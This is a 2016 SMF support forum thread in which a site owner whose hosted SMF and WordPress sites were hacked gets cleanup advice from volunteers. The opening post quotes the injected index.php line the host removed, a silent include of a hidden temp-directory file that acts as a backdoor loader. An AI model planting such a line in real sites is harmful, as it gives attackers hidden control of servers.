News:

Want to get involved in developing SMF, then why not lend a hand on our github!

Main Menu

What this Means?

Started by chamacao, October 20, 2016, 04:04:45 PM

Previous topic - Next topic

chamacao

What this Means? and How can I fix it.

My SMF forum is a closed forum. Is an agriculture forum without no users only information for now. Once all the information is available then it will open. However without any users and just by typing information in almost 6000 topics it has an adware in my index ph. I do not understand how can this happen I though the hosting company was responsible for adware infecting the domains such as this one.

This is what the people on 1and1 tell me.  7 domains that I host with all in WP were showing error 500. They (1and1) have them all now with access denied.

They also access denied my superiorfarming.org SMF forum and this is tthere answer. Again... ideas, help and what can I do?

"We received an update from our Higher Support about your escalated case. For superiorfarming.org, they remove error_reporting(0);ini_set("display_errors", 0);include_once(sys_get_temp_dir()."/SESS_48cd7517d21176f980daa5502d9efb31"); ?><?php
from index.php and set the permission. It no longer reverts back to 200. However, it seems like biofilter detected a malware in the index.ph. "


Thanks

Sir Osis of Liver

Upload a clean set of files, that will overwrite any infected files.  Your content will not be affected.
Ashes and diamonds, foe and friend,
 we were all equal in the end.

                                     - R. Waters

Steve

DO NOT pm me for support!

chamacao

Thanks Steve and Sir Osis

"Upload a clean set of files, that will overwrite any infected files". Are you referring to a new set of  my version of SMF 2.08 or the new version?

Illori

read the link provided in the post above yours.

Sir Osis of Liver

There were no database changes from 2.0.8 to 2.0.12, so you can upload the 2.0.12 upgrade package, but that may cause the forum to display incorrect version.  I would upload 2.0.8 upgrade package, then install 2.0.9, .10, .11, .12 updates with package manager.

You may be able to upload 2.0.12 upgrade, then run upgrade.php to update version numbers.  Can someone confirm if that will work?
Ashes and diamonds, foe and friend,
 we were all equal in the end.

                                     - R. Waters

Sir Osis of Liver

Ok, just tried it on test forum.  Upload 2.0.12 upgrade package, no need to run upgrade.php.  Version check reports Sources as 2.0.10 either way, but it's not a problem.
Ashes and diamonds, foe and friend,
 we were all equal in the end.

                                     - R. Waters

chamacao

I'm very afraid to messed all up and extremely worried that the server is the one having the problem. All my domains are non-accessible. All of them (7) at the same time. 6 are WordPress and 1 SMF.

Sir Osis, I do want to thank you so very much, and I appreciate greatly, that you went out the way to verify the information.



Illori

in other words it sounds like your server space has been hacked. you need to change all your passwords and upload clean files for not just your SMF but your wordpress installs as well. your host should be able to help you find out how exactly you were hacked. if i had to guess i would blame wordpress or a mod you are using for it. if you dont remove the hack, you will not get your site working correctly again.

chamacao

This is there explanation now. Which kind of go with Illori's post.

"Just last month, our Hosting Security Team reported an attack to your 1&1 web hosting space where all of your files were uploaded leading to the corruption of some of your website files. Due to this reason, we are suggesting you to clean your files(scan all of them with your anti-virus scanner) and reupload them to your webspace and please also update the versions of your old CMS (content management system) software. "

However, all WP websites were working until Oct 5, 2016 and the SMF 2.08 website was working until the Oct. 18.

I have not uploaded anything to my hosting space.

Is it possible to upload a virus to someone webspace with a delay? 
I guess my question is.  Is this a possible scenario or it this just negligence of the hosting company?,  and I may be stuck in this situation for a long time cleaning files and having them fail. If I download everything "clean it up" and take it to a new host I will miss my SQL databases right?

Thank you for your help and my apologies for the ignorance in these matters.

Sir Osis of Liver

It is possible your account has been hacked more than once, or that your host did not detect all of the hacks at the same time, as you are using multiple domains.  It appears you will need to rebuild all of your sites from scratch, so you should consider moving to a better host and doing it there.  You can get info regarding hosting services here.  If you haven't already done so, backup all your databases, hopefully none have been damaged.
Ashes and diamonds, foe and friend,
 we were all equal in the end.

                                     - R. Waters

chamacao

#11
Thanks Sir Osis for advise and patience.

Just so that I can get this straight.... (mind you I'm 66).

1. I will need to get the new WordPress version 4.61 zip file unzip it on my drive
and then using my FTP software overwrite all the files in the server for each of the domains that were made with WordPress?

2. get the latest version of SMF 2.12 (as you explained yesterday) unzip it on my drive
and then using my FTP software overwrite all the files in the server for the existing SMF 2.08?

This should not affect the SQL databases... which I have already downloaded using the host SQL control panel. * I do not know how good they are... I guess I'll find out! LOL

If 1 and 2 work, then I will get control of the websites and I can use their backup administration function of wp (export) and SMF backup to move these to a new host and into new installations.

I'm I right or did I mess it up somewhere?

[edit] email address removed to prevent spamming


Illori

you need to delete your Sources folder and your Themes folder. upload the contents of the large upgrade package. delete upgrade.php and the sql files. if you used a custom theme you will need to use repair_settings.php to set back to the default theme and then you can install your theme clean.

What is repair_settings.php?

Kindred

oh, you will need to do much more than you suggest...  even more than Illori suggests -- because it is quite likely that, by now, your entire series of sites is compromised up and down and even sideways.

The hackers have likely buried back doors deep in the directory structures... so overwriting files and even keeping anything is likely to just get rehacked in minutes...
You are going to have to go through every directory that you plan to keep and find any files or subdirectories that do not belong...


Or, you can just call it a loss, keep just the database (which preserves the content itself).
You will lose an images, avatars, attachments....
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

chamacao

I downloaded a copy of every single directory from every domain into a clean hard drive attached to my computer through one of the USB ports using FilleZilla

FilleZilla show some files that will not transfer down. (failures)

The drive was scanned in its entirety with Kaspersky no virus are found

Now ?

Kindred

No...  the virus scanner won't catch server level stuff...
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

chamacao

Thanks Kindred.
So this by the support team of 1and1

"Just last month, our Hosting Security Team reported an attack to your 1&1 web hosting space where all of your files were uploaded leading to the corruption of some of your website files. Due to this reason, we are suggesting you to clean your files(scan all of them with your anti-virus scanner) and reupload them to your webspace and please also update the versions of your old CMS (content management system) software. "

Is bull?

Kindred

Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

Sir Osis of Liver

Quote from: chamacao on October 21, 2016, 04:02:08 PM
This should not affect the SQL databases... which I have already downloaded using the host SQL control panel. * I do not know how good they are... I guess I'll find out!

It has been my experience that host database backups are usually the most reliable method.  phpmyadmin will often timeout without error if db is large and server is slow, and leave you with a partial backup.  Third party utilities (like MySQLDumper) can be a bit squirrelly if they run into a server config they don't like.  Whichever method you use, do the backup 2-3 times and confirm that the dump files are the same size.

Quote(mind you I'm 66)

That's no excuse.

* Sir Osis was 66 this past March (but his liver is 96).  :P


Ashes and diamonds, foe and friend,
 we were all equal in the end.

                                     - R. Waters

chamacao

Sorry about that.
My liver went out at 15 with hepatitis and at 26 with cirrhosis. No more of that for me.
Thanks for all your help.

These are some of the files downloaded from the server and I ran the antivirus. None was found however, there are a bunch of double files.. Is that normal.? I never put much attention to this, so I took a screen image.


Advertisement: